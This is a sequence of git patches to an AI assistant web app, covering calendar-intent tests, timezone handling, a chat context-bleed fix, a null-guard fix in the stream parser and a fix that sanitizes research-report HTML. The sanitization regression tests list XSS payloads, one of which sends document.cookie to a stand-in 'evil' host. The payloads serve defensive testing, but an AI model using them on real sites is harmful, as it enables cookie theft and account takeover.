+              if (json.delta || json.type === 'tool_start' || json.type === 'tool_output' || json.type === 'tool_progress' || json.type === 'agent_step' || json.type === 'doc_stream_open' || json.type === 'doc_stream_delta' || json.type === 'research_progress') {
+                clearResponseTimeout();
                 clearProcessingProbe();
               }
               if (json.delta) {
@@ -2710,6 +2730,7 @@ import createResearchSynapse from './researchSynapse.js';
         }
       }
     } finally {
+      clearResponseTimeout();
       clearProcessingProbe();
       // Streaming done — let screen readers announce the settled response.
       const _chatLogDone = document.getElementById('chat-history');
diff --git a/tests/test_action_intents.py b/tests/test_action_intents.py
index 87f59fa..164ed4d 100644
--- a/tests/test_action_intents.py
+++ b/tests/test_action_intents.py
@@ -1,14 +1,26 @@
-from src.action_intents import message_needs_tools
+from src.action_intents import classify_tool_intent, message_needs_tools
 
 
 def test_calendar_entry_request_promotes_to_agent():
     assert message_needs_tools("Can you add an entry to my calendar?")
+    intent = classify_tool_intent("Can you add an entry to my calendar?")
+    assert intent.needs_tools
+    assert intent.category == "calendar"
 
 
 def test_calendar_imperative_variants_promote_to_agent():
     assert message_needs_tools("add lunch with Sam to my calendar tomorrow at noon")
     assert message_needs_tools("schedule a call with Mina next Friday")
     assert message_needs_tools("put dentist appointment on my calendar")
+    assert message_needs_tools("Alright. Recreate that same appointment")
+    assert message_needs_tools("Okay delete that doctor appointment from the calendar")
+    assert message_needs_tools("have another go at adding a test entry to the calendar")
+    assert message_needs_tools(
+        "Okay so you should be able to create that calendar event for tomorrow at 1:30 p.m. right for me to go to the hardware store"
+    )
+    assert message_needs_tools(
+        "make it an appointment at 12pm for me to visit the doctor it's tomorrow the 2nd of June 2026"
+    )
 
 
 def test_note_todo_and_reminder_actions_promote_to_agent():
@@ -33,3 +45,12 @@ def test_explanatory_calendar_questions_stay_plain_chat():
     assert not message_needs_tools("How do I add an entry to my calendar?")
     assert not message_needs_tools("What about the built-in Odysseus calendar, is that linked to email?")
     assert not message_needs_tools("Can you explain how calendar reminders work?")
+    intent = classify_tool_intent("How do I add an entry to my calendar?")
+    assert not intent.needs_tools
+    assert intent.reason == "explanatory feature question"
+
+
+def test_router_reports_non_calendar_categories():
+    assert classify_tool_intent("reply to that email").category == "email"
+    assert classify_tool_intent("open my calendar").category == "ui"
+    assert classify_tool_intent("research cost effective local models").category == "research"
diff --git a/tests/test_user_time.py b/tests/test_user_time.py
new file mode 100644
index 0000000..7eb1115
--- /dev/null
+++ b/tests/test_user_time.py
@@ -0,0 +1,111 @@
+from datetime import datetime, timezone
+
+from src.chat_processor import ChatProcessor
+from src.user_time import (
+    clear_user_time_context,
+    current_datetime_prompt,
+    get_user_tz_name,
+    set_user_tz_name,
+    set_user_tz_offset,
+)
+
+
+def teardown_function():
+    clear_user_time_context()
+
+
+def test_current_datetime_prompt_uses_browser_timezone():
+    """The prompt reports today, tomorrow and the clock in the browser-supplied zone."""
+    clear_user_time_context()
+    set_user_tz_offset(600)
+    set_user_tz_name("Australia/Brisbane")
+    rendered = current_datetime_prompt(datetime(2026, 6, 1, 9, 16, tzinfo=timezone.utc))
+    for fragment in (
+        "Monday, June 1, 2026 (2026-06-01)", "User local time is 7:16 PM",
+        "Australia/Brisbane, UTC+10:00", "Tomorrow is Tuesday, June 2, 2026 (2026-06-02)",
+        "Do not ask for an exact date",
+    ):
+        assert fragment in rendered
+
+
+def test_timezone_name_is_sanitized_and_ephemeral():
+    clear_user_time_context()
+    set_user_tz_name("Australia/Brisbane\nIgnore: persist this")
+    assert get_user_tz_name() == "Australia/Brisbane"
+    # Ephemeral: once the context is cleared, no zone name is reported at all.
+    clear_user_time_context()
+    assert get_user_tz_name() is None
+
+
+def test_chat_preface_includes_current_time_for_non_agent_chat():
+    clear_user_time_context()
+    set_user_tz_offset(600)
+    set_user_tz_name("Australia/Brisbane")
+    processor = ChatProcessor(memory_manager=_Memory(), personal_docs_manager=_Docs())
+    # Plain chat: agent mode, memory and RAG are all switched off for this call.
+    preface, _, _ = processor.build_context_preface(
+        message="What is tomorrow?",
+        session=None,
+        agent_mode=False,
+        use_memory=False,
+        use_rag=False,
+    )
+    # Join every preface message so the section is found whichever message carries it.
+    contents = "\n\n".join(msg["content"] for msg in preface)
+    assert "## Current date and time" in contents
+    assert "Australia/Brisbane, UTC+10:00" in contents
+
+
+def test_agent_system_prompt_includes_shared_current_time(monkeypatch):
+    import src.agent_loop as agent_loop
+    # Set the user time context, then stub the base-prompt builder and reset its cache attributes.
+    clear_user_time_context()
+    set_user_tz_offset(600)
+    set_user_tz_name("Australia/Brisbane")
+    monkeypatch.setattr(agent_loop, "_build_base_prompt", lambda *args, **kwargs: ("BASE PROMPT", ""))
+    monkeypatch.setattr(agent_loop, "set_active_model", lambda model: None)
+    monkeypatch.setattr(agent_loop, "get_builtin_overrides", lambda: {})
+    monkeypatch.setattr(agent_loop, "_cached_base_prompt", None)
+    monkeypatch.setattr(agent_loop, "_cached_base_prompt_key", None)
+    # Minimal call: empty list, no active document, no MCP manager.
+    messages, _ = agent_loop._build_system_prompt(
+        [],
+        model="gpt-oss-120b",
+        active_document=None,
+        mcp_mgr=None,
+    )
+    # The first message must be the system prompt, holding the time section and the stubbed base text.
+    assert messages[0]["role"] == "system"
+    assert "## Current date and time" in messages[0]["content"]
+    assert "Australia/Brisbane, UTC+10:00" in messages[0]["content"]
+    assert "BASE PROMPT" in messages[0]["content"]
+
+
+def test_calendar_relative_time_parser_handles_dotted_pm(monkeypatch):
+    import routes.calendar_routes as calendar_routes
+    # Stand-in for datetime whose now() is pinned to 2026-06-01 09:16 UTC.
+    class FixedDateTime(datetime):
+        @classmethod
+        def now(cls, tz=None):
+            value = datetime(2026, 6, 1, 9, 16, tzinfo=timezone.utc)
+            if tz is not None:
+                return value.astimezone(tz)
+            return value.replace(tzinfo=None)
+    # User context is UTC+10:00; calendar_routes sees the pinned clock through its `datetime` name.
+    clear_user_time_context()
+    set_user_tz_offset(600)
+    set_user_tz_name("Australia/Brisbane")
+    monkeypatch.setattr(calendar_routes, "datetime", FixedDateTime)
+    # "p.m" (dotted, no trailing dot) is the spelling under test.
+    parsed = calendar_routes.parse_due_for_user("tomorrow at 1:30 p.m")
+    # Expected: the day after the pinned date, 13:30, carrying the +10:00 offset.
+    assert parsed == "2026-06-02T13:30:00+10:00"
+
+
+class _Memory:
+    def load(self, owner=None):
+        return []
+
+
+class _Docs:
+    rag_manager = None

From 594775dc4b9de28bfa01efd4aa1344b575b6a9d7 Mon Sep 17 00:00:00 2001
From: "Massab K." <massab725@gmail.com>
Date: Thu, 4 Jun 2026 17:27:46 +0500
Subject: [PATCH 05/12] Fix issue 135 chat context bleed (#281)

* Fix issue 135 chat context bleed

* Guard task delivery metadata access
---
 routes/chat_routes.py    | 19 ++++++++++++++++++-
 routes/session_routes.py | 15 +++++++++++++--
 src/builtin_actions.py   |  7 +++++--
 src/session_actions.py   | 12 +++++++++---
 src/task_scheduler.py    | 16 ++++++++++++----
 5 files changed, 57 insertions(+), 12 deletions(-)

diff --git a/routes/chat_routes.py b/routes/chat_routes.py
index 8dd17a5..a3c6c16 100644
--- a/routes/chat_routes.py
+++ b/routes/chat_routes.py
@@ -525,7 +525,24 @@ def setup_chat_routes(
                 _doc_q = _doc_db.query(DBDocument).filter(DBDocument.id == active_doc_id)
                 active_doc = _owner_session_filter(_doc_q, ctx.user).first()
                 if active_doc:
-                    logger.info(f"[doc-inject] found by ID: title={active_doc.title!r}, lang={active_doc.language!r}, is_active={active_doc.is_active}, content_len={len(active_doc.current_content or '')}")
+                    doc_session = active_doc.session_id
+                    doc_owner = getattr(active_doc, "owner", None)
+                    if doc_owner and ctx.user and doc_owner != ctx.user:
+                        logger.warning(
+                            "[doc-inject] ignoring active_doc_id %s owned by another user",
+                            active_doc_id,
+                        )
+                        active_doc = None
+                    elif doc_session and doc_session != session:
+                        logger.warning(
+                            "[doc-inject] ignoring stale active_doc_id %s from session %s while in session %s",
+                            active_doc_id,
+                            doc_session,
+                            session,
+                        )
+                        active_doc = None
+                    else:
+                        logger.info(f"[doc-inject] found by ID: title={active_doc.title!r}, lang={active_doc.language!r}, is_active={active_doc.is_active}, content_len={len(active_doc.current_content or '')}")
                 else:
                     logger.warning(f"[doc-inject] NOT FOUND by ID {active_doc_id}")
             if not active_doc:
diff --git a/routes/session_routes.py b/routes/session_routes.py
index 58cb8ae..049635d 100644
--- a/routes/session_routes.py
+++ b/routes/session_routes.py
@@ -94,7 +94,6 @@ logger = logging.getLogger(__name__)
 
 router = APIRouter(prefix="/api", tags=["sessions"])
 
-
 def _current_user_is_admin(request: Request, user: str | None) -> bool:
     if not user:
         return False
@@ -142,6 +141,17 @@ def _persist_session_headers(session_id: str, headers: dict | None) -> None:
         db.close()
 
 
+_HIDDEN_SYSTEM_SESSION_NAMES = {  # session names left out of the session list built in setup_session_routes
+    "[Task] Chat Sessions Tidy",
+    "[Task] Documents Tidy",
+    "[Task] Memory Tidy",
+    "[Task] Research Tidy",
+    "[Task] Email Mark Boundaries",
+    "[Task] Email Tags",
+    "[Task] Skills Audit",
+}
+
+
 def _pick_endpoint_for_sort(owner=None):
     """Pick model endpoint for auto-sort LLM call — uses utility endpoint setting, falls back to default."""
     from src.endpoint_resolver import resolve_endpoint
@@ -265,7 +275,8 @@ def setup_session_routes(session_manager: SessionManager, config: dict, webhook_
                      "message_count": msg_count_map.get(s.id, 0)}
                     for s in user_sessions.values()
                     if not s.archived
-                    and (s.name or "").strip() not in ("Nobody", "Incognito")]
+                    and (s.name or "").strip() not in ("Nobody", "Incognito")
+                    and (s.name or "").strip() not in _HIDDEN_SYSTEM_SESSION_NAMES]
 
         return sessions
     
diff --git a/src/builtin_actions.py b/src/builtin_actions.py
index 0b19e35..6b96e31 100644
--- a/src/builtin_actions.py
+++ b/src/builtin_actions.py
@@ -38,13 +38,16 @@ class TaskDeferred(BaseException):
 
 
 async def action_tidy_sessions(owner: str, **kwargs) -> Tuple[str, bool]:
-    """Delete empty/throwaway sessions for the owner. Pure heuristic —
+    """Delete empty sessions for the owner. Pure heuristic —
     the LLM folder-sort phase is skipped (user opted to keep this task
     LLM-free; sorting can be triggered manually via the Chats UI)."""
     try:
         import asyncio
         from src.session_actions import run_auto_sort
-        result = await asyncio.wait_for(run_auto_sort(owner, skip_llm=True), timeout=60)
+        result = await asyncio.wait_for(
+            run_auto_sort(owner, skip_llm=True, delete_throwaway=False),
+            timeout=60,
+        )
         return result, True
     except asyncio.TimeoutError:
         logger.error("tidy_sessions action timed out")
diff --git a/src/session_actions.py b/src/session_actions.py
index fd3e315..7f0944b 100644
--- a/src/session_actions.py
+++ b/src/session_actions.py
@@ -8,7 +8,7 @@ and the task scheduler / builtin actions system.
 import json
 import logging
 import re
-from datetime import datetime
+from datetime import datetime, timedelta
 
 logger = logging.getLogger(__name__)
 
@@ -22,9 +22,10 @@ _THROWAWAY_NAMES = {
     "ok", "lol", "bruh", "hmm", "hm", "meh",
 }
 _THROWAWAY_MAX_MESSAGES = 4
+_FRESH_EMPTY_SESSION_GRACE = timedelta(minutes=10)
 
 
-async def run_auto_sort(owner: str, skip_llm: bool = False) -> str:
+async def run_auto_sort(owner: str, skip_llm: bool = False, delete_throwaway: bool = True) -> str:
     """Run session cleanup + (optional) AI folder sort for the given owner.
 
     Args:
@@ -32,6 +33,7 @@ async def run_auto_sort(owner: str, skip_llm: bool = False) -> str:
         skip_llm: when True, do only Phase 1 (delete empty/throwaway sessions);
             skip Phase 2 (AI folder assignment). Used by the built-in daily
             background sweep so it never burns LLM tokens.
+        delete_throwaway: when False, only empty/incognito sessions are deleted.
 
     Returns a human-readable summary of what was done.
     """
@@ -53,6 +55,8 @@ async def run_auto_sort(owner: str, skip_llm: bool = False) -> str:
         for row in rows:
             if getattr(row, 'is_important', False):
                 continue
+            created_at = row.created_at or row.updated_at or datetime.utcnow()
+            is_fresh = (datetime.utcnow() - created_at) < _FRESH_EMPTY_SESSION_GRACE
             if (row.name or "").strip() == "Incognito":
                 deleted_throwaway += 1
                 db.delete(row)
@@ -64,9 +68,11 @@ async def run_auto_sort(owner: str, skip_llm: bool = False) -> str:
             should_delete = False
 
             if msg_count == 0:
+                if is_fresh:
+                    continue
                 should_delete = True
                 deleted_empty += 1
-            elif msg_count <= _THROWAWAY_MAX_MESSAGES:
+            elif delete_throwaway and msg_count <= _THROWAWAY_MAX_MESSAGES:
                 name = (row.name or "").strip().lower()
                 first_msg = db.query(DbMsg.content).filter(
                     DbMsg.session_id == row.id, DbMsg.role == "user"
diff --git a/src/task_scheduler.py b/src/task_scheduler.py
index 4384705..65fc451 100644
--- a/src/task_scheduler.py
+++ b/src/task_scheduler.py
@@ -979,10 +979,10 @@ class TaskScheduler:
             task = db.query(ScheduledTask).filter(ScheduledTask.id == task_id).first()
             if not task:
                 return True
-            task_type = task.task_type or "llm"
+            task_type = getattr(task, "task_type", "") or "llm"
             if task_type != "action":
                 return True
-            return (task.action or "") in self._MODEL_BACKED_ACTIONS
+            return (getattr(task, "action", "") or "") in self._MODEL_BACKED_ACTIONS
         finally:
             db.close()
 
@@ -992,7 +992,7 @@ class TaskScheduler:
         if "check-in" in (task.name or "").lower():
             return
         # Built-in housekeeping noise stays out of the chat.
-        if (task.action or "") in self._SILENT_ACTIONS:
+        if (getattr(task, "action", "") or "") in self._SILENT_ACTIONS:
             return
         from src.assistant_log import log_to_assistant
         log_to_assistant(
@@ -1408,6 +1408,12 @@ class TaskScheduler:
         from core.database import Session as DbSession, ChatMessage, CrewMember
 
         output = task.output_target or "session"
+        if (
+            output == "session"
+            and (getattr(task, "task_type", "") or "") == "action"
+            and (getattr(task, "action", "") or "") in self._SILENT_ACTIONS
+        ):
+            return
         if output.startswith("mcp__"):
             await self._deliver_via_mcp(output, task, result)
             return
@@ -2069,6 +2075,8 @@ class TaskScheduler:
                 # Built-in housekeeping/action jobs should not create browser
                 # task notifications; user AI/research tasks still can.
                 task.notifications_enabled = False
+                if (task.output_target or "session") == "session":
+                    task.output_target = defs.get("output_target", "none")
             seeded = []
             for action, defs in HOUSEKEEPING_DEFAULTS.items():
                 if action in existing_actions:
@@ -2099,7 +2107,7 @@ class TaskScheduler:
                     # AI/email/calendar tasks opt into a paused starting state
                     # via ship_paused so users can enable them deliberately.
                     status="paused" if ships_paused else "active",
-                    output_target="session",
+                    output_target=defs.get("output_target", "none"),
                     notifications_enabled=False,
                 )
                 db.add(task)

From fa1fe7f866a73fc8d31b78e67faa7cd76dfbeb63 Mon Sep 17 00:00:00 2001
From: Joeseph Grey <212606152+StressTestor@users.noreply.github.com>
Date: Thu, 4 Jun 2026 06:42:49 -0600
Subject: [PATCH 06/12] security: sanitize rendered research-report HTML (#364)

The visual research report is assembled from LLM output over crawled web
pages (untrusted content) and served under a relaxed `script-src
'unsafe-inline'` CSP. Two values reached that HTML without sanitization:

- `_md_to_html` rendered the report markdown via python-markdown, which
  passes raw HTML through verbatim, so `<script>` / `<img onerror>` /
  `<svg onload>` / `javascript:` links carried in crawled content ran in
  the app origin.
- `category` (from the /api/research/start request body, no enum check) was
  interpolated raw into `<body class="category-{category}">`.

Allowlist-sanitize the rendered markdown with nh3, keeping the formatting
the report emits (tables, code, details/summary, toc anchors, codehilite
classes, external-link target/rel) while dropping active content, and
html.escape the category. Adds regression tests.
---
 requirements.txt                   |  4 ++
 src/visual_report.py               | 37 ++++++++++++++++-
 tests/test_security_regressions.py | 67 ++++++++++++++++++++++++++++++
 3 files changed, 106 insertions(+), 2 deletions(-)

diff --git a/requirements.txt b/requirements.txt
index e4630d1..2c40729 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -21,6 +21,10 @@ youtube-transcript-api
 # Markdown rendering for research reports (src/visual_report.py).
 # Imported at module-top so it's a hard core dep, not optional.
 markdown
+# HTML sanitizer for rendered research reports (src/visual_report.py). Report
+# content is untrusted (LLM output over crawled pages) and report pages run
+# under a relaxed CSP, so the rendered HTML is allowlist-sanitized.
+nh3
 # Calendar .ics import/export (routes/calendar_routes.py).
 icalendar
 # Recurrence rule expansion for calendar events (routes/calendar_routes.py).
diff --git a/src/visual_report.py b/src/visual_report.py
index 70af4b2..b15c800 100644
--- a/src/visual_report.py
+++ b/src/visual_report.py
@@ -25,9 +25,27 @@ from src.research_utils import strip_thinking
 from urllib.parse import urlparse
 
 import markdown
+import nh3
 
 logger = logging.getLogger(__name__)
 
+# Allowlist for rendered research-report HTML. It starts from nh3's safe
+# defaults (which drop <script>, inline event handlers, and javascript: URLs)
+# and re-admits only what the report itself emits: the collapsible raw-findings
+# block (<details>/<summary>), heading ids for table-of-contents anchors,
+# codehilite classes, table alignment, and target/rel on external links.
+_REPORT_ALLOWED_TAGS = set(nh3.ALLOWED_TAGS) | {"details", "summary"}
+_REPORT_ALLOWED_ATTRS = {k: set(v) for k, v in nh3.ALLOWED_ATTRIBUTES.items()}
+for _names, _extra in (
+    (("h1", "h2", "h3", "h4", "h5", "h6"), {"id"}),
+    (("span", "code", "pre", "div", "table", "td", "th"), {"class"}),
+    (("td", "th"), {"align"}),
+    (("a",), {"href", "title", "target", "rel"}),
+    (("img",), {"src", "alt", "title"}),
+):
+    for _t in _names:
+        _REPORT_ALLOWED_ATTRS.setdefault(_t, set()).update(_extra)
+
 # ---------------------------------------------------------------------------
 # Helpers
 # ---------------------------------------------------------------------------
@@ -48,7 +66,14 @@ def _autolink_urls(md_text: str) -> str:
 
 
 def _md_to_html(md_text: str) -> str:
-    """Convert markdown to HTML with common extensions."""
+    """Convert markdown to HTML with common extensions.
+
+    Research-report markdown is assembled from LLM output over crawled web
+    pages (untrusted content), and report pages are served under a relaxed
+    `script-src 'unsafe-inline'` CSP. python-markdown passes raw HTML through
+    verbatim, so the rendered output is allowlist-sanitized to strip any
+    <script>/inline-event-handler/javascript: markup before it reaches the page.
+    """
     md_text = _autolink_urls(md_text)
     result = markdown.markdown(
         md_text,
@@ -64,6 +89,14 @@ def _md_to_html(md_text: str) -> str:
         r'<a target="_blank" rel="noopener noreferrer" href="\1',
         result,
     )
+    # Sanitize: report content is untrusted and the report CSP allows inline
+    # scripts, so strip active content while keeping the formatting above.
+    result = nh3.clean(
+        result,
+        tags=_REPORT_ALLOWED_TAGS,
+        attributes=_REPORT_ALLOWED_ATTRS,
+        link_rel=None,
+    )
     return result
 
 
@@ -1864,7 +1897,7 @@ def generate_visual_report(
         restore_btn_html=restore_btn_html,
         timestamp=timestamp,
         category_css=_category_css(category),
-        body_class=f"category-{category}" if category else "",
+        body_class=f"category-{html.escape(str(category))}" if category else "",
         session_id_js=json_dumps_str(session_id or ""),
         spare_images_js=_json_for_script(spare_images),
     )
diff --git a/tests/test_security_regressions.py b/tests/test_security_regressions.py
index 0792b9a..01c09a4 100644
--- a/tests/test_security_regressions.py
+++ b/tests/test_security_regressions.py
@@ -1041,3 +1041,70 @@ def test_chat_active_document_lookup_is_owner_scoped():
     assert "filter( DBDocument.id == active_doc_id, ).first()" not in flat
     assert "filter(DBDocument.id == active_doc_id).first()" not in flat
     assert "filter(DBDocument.id == _mem_id).first()" not in flat
+
+
+# ── research report HTML sanitization (visual report stored XSS) ──
+#
+# `src.visual_report._md_to_html` renders the deep-research report, whose
+# markdown is built from LLM output over crawled web pages (untrusted content).
+# python-markdown passes raw HTML through verbatim, and report pages are served
+# under a relaxed `script-src 'unsafe-inline'` CSP, so any markup surviving into
+# the report would execute in the app origin. The render must allowlist-sanitize.
+
+@pytest.mark.parametrize("payload", [
+    "<script>alert(document.domain)</script>",
+    '<img src=x onerror="fetch(\'//evil/\'+document.cookie)">',
+    "<svg onload=alert(1)>",
+    '<a href="javascript:alert(1)">x</a>',
+])
+def test_md_to_html_strips_active_content(payload):
+    """No script tag, inline event handler, or javascript: URL survives rendering."""
+    from src.visual_report import _md_to_html
+
+    rendered = _md_to_html(f"Report body.\n\n{payload}").lower()
+
+    # Every marker is checked for every payload, not only the one it carries.
+    for marker in ("<script", "onerror=", "onload=", "javascript:"):
+        assert marker not in rendered
+
+
+def test_md_to_html_preserves_normal_report_formatting():
+    from src.visual_report import _md_to_html
+    # One sample of each construct checked below: heading, bold, link, table, fenced code, <details>.
+    md = (
+        "## Findings\n\n"
+        "**bold** and a [source](https://example.com/p).\n\n"
+        "| A | B |\n|---|---|\n| 1 | 2 |\n\n"
+        "```python\ndef x():\n    return 1\n```\n\n"
+        "<details>\n<summary>Raw findings</summary>\n\ncontent\n</details>\n"
+    )
+    out = _md_to_html(md)
+    # Sanitization must not strip any of the legitimate formatting.
+    assert "<h2 id=" in out                          # heading + toc anchor preserved
+    assert "<table" in out and "<td" in out           # table
+    assert "<pre" in out and "<code" in out           # fenced code block
+    assert "<details" in out and "<summary" in out    # collapsible raw-findings section
+    assert 'href="https://example.com/p"' in out      # external link kept
+    assert 'rel="noopener' in out                     # ...and rel-hardened
+
+
+def test_visual_report_escapes_request_category():
+    # `category` comes unvalidated from the /api/research/start request body and
+    # is interpolated into <body class="category-{category}"> on a page served
+    # under `script-src 'unsafe-inline'`; unescaped, it is an attribute-injection
+    # XSS that does not depend on the markdown body at all.
+    from src.visual_report import generate_visual_report
+
+    hostile = '"><script>alert(document.domain)</script>'
+    page = generate_visual_report(
+        question="q", report_markdown="## H\n\nbody", category=hostile,
+    )
+
+    assert "<script>alert(document.domain)" not in page   # no breakout
+    assert "&lt;script&gt;" in page                        # rendered as inert text
+
+    # There is no type check at the request boundary either, so a non-string
+    # category has to be coerced rather than crash the render (html.escape
+    # only accepts str).
+    numeric = generate_visual_report(question="q", report_markdown="## H", category=12345)
+    assert "category-12345" in numeric

From bc9104efe2e03c1cae23139be4b52db6d6db4e59 Mon Sep 17 00:00:00 2001
From: Giuseppe <peppecastellos245@icloud.com>
Date: Thu, 4 Jun 2026 14:53:10 +0200
Subject: [PATCH 07/12] fix: SSE stream parser crashes with NoneType on
 providers sending null choice/usage/tc entries (#2389)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* fix: SSE parser crashes with NoneType on MiniMax-M3 (and any provider sending null choice/usage/tc)

Three guards added in stream_llm:

1. choices[0] null check — MiniMax (and some other providers) send a
   choices entry as None. `_choices[0].get("delta")` raised
   AttributeError. Now checks `_choices[0] is not None` before calling
   .get().

2. usage null guard — j["usage"] can arrive as None (not a dict) on
   some providers. Added `or {}` so subsequent .get() calls don't crash.

3. tool_calls null entry skip — individual entries in the tool_calls
   array can be None. Added `if tc is None: continue` before
   tc.get("function").

All three match the `or {}` / null-guard pattern used elsewhere in the
same block. Safe for all OpenAI-compatible providers.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* fix: guard null choice in elif-choices SSE branch

The usage-chunk path already guarded _choices[0] is not None, but the
elif "choices" branch that processes content/tool-call deltas did not.
A chunk like {"choices": [null]} or {"choices": [null], "usage": null}
reaches j["choices"][0].get("delta") and crashes with:

    'NoneType' object has no attribute 'get'

Fix: extract choices[0] into _c0 and continue to the next chunk when
it is None, matching the guard already applied in the usage path.

Adds three focused regressions covering the paths the maintainer flagged:
- {"choices": [null]}
- {"choices": [null], "usage": null}
- tool_calls array containing a null entry alongside a valid call

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
---
 src/llm_core.py                           | 11 +++--
 tests/test_llm_core_usage_finish_delta.py | 53 +++++++++++++++++++++++
 2 files changed, 61 insertions(+), 3 deletions(-)

diff --git a/src/llm_core.py b/src/llm_core.py
index be31ac5..a929edc 100644
--- a/src/llm_core.py
+++ b/src/llm_core.py
@@ -1398,7 +1398,7 @@ async def stream_llm(url: str, model: str, messages: List[Dict], temperature: fl
                                 j = json.loads(data)
                                 # Usage chunk (from stream_options)
                                 _choices = j.get("choices") or []
-                                _delta0 = _choices[0].get("delta") if _choices else None
+                                _delta0 = _choices[0].get("delta") if (_choices and _choices[0] is not None) else None
                                 # Capture usage whenever the chunk carries it and
                                 # the delta has no actual output. Some gateways /
                                 # local servers attach usage to the FINAL delta,
@@ -1412,7 +1412,7 @@ async def stream_llm(url: str, model: str, messages: List[Dict], temperature: fl
                                     or _delta0.get("tool_calls")
                                 )
                                 if "usage" in j and not _delta_has_output:
-                                    u = j["usage"]
+                                    u = j["usage"] or {}
                                     _usage_data = {"input_tokens": u.get("prompt_tokens", 0), "output_tokens": u.get("completion_tokens", 0)}
                                     # llama.cpp puts a `timings` block alongside `usage` with the
                                     # TRUE generation speed (predicted_per_second) — pure decode,
@@ -1427,7 +1427,10 @@ async def stream_llm(url: str, model: str, messages: List[Dict], temperature: fl
                                             _usage_data["prefill_tps"] = round(_tm["prompt_per_second"], 2)
                                     yield f'data: {json.dumps({"type": "usage", "data": _usage_data})}\n\n'
                                 elif "choices" in j:
-                                    delta = j["choices"][0].get("delta") or {}
+                                    _c0 = (j["choices"] or [None])[0]
+                                    if _c0 is None:
+                                        continue
+                                    delta = _c0.get("delta") or {}
                                     if isinstance(delta, dict):
                                         # Text content
                                         # Reasoning tokens (VLLM --reasoning-parser, e.g. Qwen3/DeepSeek-R1, Nemotron). vLLM 0.20.2 / NIM emit the field as `reasoning`; older builds use `reasoning_content`. Accept either.
@@ -1446,6 +1449,8 @@ async def stream_llm(url: str, model: str, messages: List[Dict], temperature: fl
                                             yield f'data: {json.dumps({"delta": content})}\n\n'
                                         # Native tool calls — accumulate across chunks
                                         for tc in delta.get("tool_calls") or []:
+                                            if tc is None:
+                                                continue
                                             func = tc.get("function") or {}
                                             raw_idx = tc.get("index")
                                             if raw_idx is None:
diff --git a/tests/test_llm_core_usage_finish_delta.py b/tests/test_llm_core_usage_finish_delta.py
index 9f28f9f..507939d 100644
--- a/tests/test_llm_core_usage_finish_delta.py
+++ b/tests/test_llm_core_usage_finish_delta.py
@@ -101,3 +101,56 @@ def test_usage_on_empty_choices_chunk_still_captured(monkeypatch):
     ]
     usage = _usage_events(_drive(monkeypatch, lines))
     assert usage and usage[-1] == {"input_tokens": 4, "output_tokens": 2}
+
+
+def test_null_choice_chunk_does_not_crash(monkeypatch):
+    # Some providers emit {"choices": [null]} as a heartbeat/keepalive chunk.
+    # The parser must silently skip it rather than crashing on None.get("delta").
+    lines = [
+        'data: ' + json.dumps({"choices": [{"delta": {"content": "Hello"}}]}),
+        'data: ' + json.dumps({"choices": [None]}),
+        'data: [DONE]',
+    ]
+    result = _drive(monkeypatch, lines)
+    assert "Hello" in result
+
+
+def test_null_choice_with_null_usage_does_not_crash(monkeypatch):
+    # Chunk with both choices:[null] and usage:null — neither field should panic.
+    lines = [
+        'data: ' + json.dumps({"choices": [{"delta": {"content": "Hi"}}]}),
+        'data: ' + json.dumps({"choices": [None], "usage": None}),
+        'data: [DONE]',
+    ]
+    result = _drive(monkeypatch, lines)
+    assert "Hi" in result
+
+
+def test_null_tool_call_in_delta_is_skipped(monkeypatch):
+    # Some providers include null entries in the tool_calls array alongside
+    # valid calls. The null entry must be skipped; the valid call must survive.
+    lines = [
+        'data: ' + json.dumps({
+            "choices": [{
+                "delta": {
+                    "tool_calls": [
+                        None,
+                        {"index": 0, "function": {"name": "get_weather", "arguments": '{"city":'}},
+                    ]
+                }
+            }]
+        }),
+        'data: ' + json.dumps({
+            "choices": [{
+                "delta": {
+                    "tool_calls": [
+                        {"index": 0, "function": {"name": "", "arguments": '"London"}'}},
+                    ]
+                }
+            }]
+        }),
+        'data: [DONE]',
+    ]
+    result = _drive(monkeypatch, lines)
+    # The stream completes without error; the valid tool call was accumulated.
+    assert result is not None

From e92719263e11c827e66457b4cecbc0a79d5aae79 Mon Sep 17 00:00:00 2001
From: Fellah Youssef <fellahyoussef010@gmail.com>
Date: Thu, 4 Jun 2026 14:02:52 +0100
Subject: [PATCH 08/12] feat(ui): allow expanding consolidated file chip
 regardless of count (#1849) (#2086)

---
 static/js/fileHandler.js | 14 +++++---------
 1 file changed, 5 insertions(+), 9 deletions(-)

diff --git a/static/js/fileHandler.js b/static/js/fileHandler.js
index 88f995c..b5d24d4 100644
--- a/static/js/fileHandler.js
+++ b/static/js/fileHandler.js
@@ -17,6 +17,10 @@ let API_BASE = '';
 let _uploadSpinners = [];
 const _previewUrls = new WeakMap();
 
+const MAX_FILES = 10;
+const MAX_VISIBLE = 3;
+let _expanded = false;
+
 function _getPreviewUrl(f) {
   if (!f) return '';
   let url = _previewUrls.get(f);
@@ -49,10 +53,6 @@ export function openPicker() {
   document.getElementById('file-input').click();
 }
 
-const MAX_VISIBLE = 3;
-const MAX_EXPAND = 6;   // beyond this, the badge stays collapsed (too many chips to preview)
-let _expanded = false;
-
 /**
  * Render the attachment strip with pending files.
  * 1-3 files: show individual chips.
@@ -80,11 +80,9 @@ export function renderAttachStrip() {
     label.className = 'thumb-collapsed-label';
     badge.appendChild(label);
     badge.title = pendingFiles.map(f => f.name || 'pasted-image').join('\n');
-    const canExpand = total <= MAX_EXPAND;
-    badge.style.cursor = canExpand ? 'pointer' : 'default';
+    badge.style.cursor = 'pointer';
     badge.addEventListener('click', (e) => {
       if (e.target.closest('.thumb-collapsed-x')) return;
-      if (!canExpand) return;   // too many files — don't expand into chips
       _expanded = true;
       renderAttachStrip();
     });
@@ -201,8 +199,6 @@ export async function uploadPending() {
   }
 }
 
-const MAX_FILES = 10;
-
 /**
  * Add files to pending list (capped at MAX_FILES)
  */

From d3e6935d62eb7a1d0f7016566127e6b4ca45f727 Mon Sep 17 00:00:00 2001
From: raf <146721410+rafdog1222@users.noreply.github.com>
Date: Thu, 4 Jun 2026 21:19:51 +0800
Subject: [PATCH 09/12] fix(tests): update search service mock to match current
 API signature (#2334)

comprehensive_web_search is now called with (query, max_pages, return_sources)
and returns a tuple (_context, results). The test mock still used the old
async signature with max_results/fetch_content and returned a plain list,
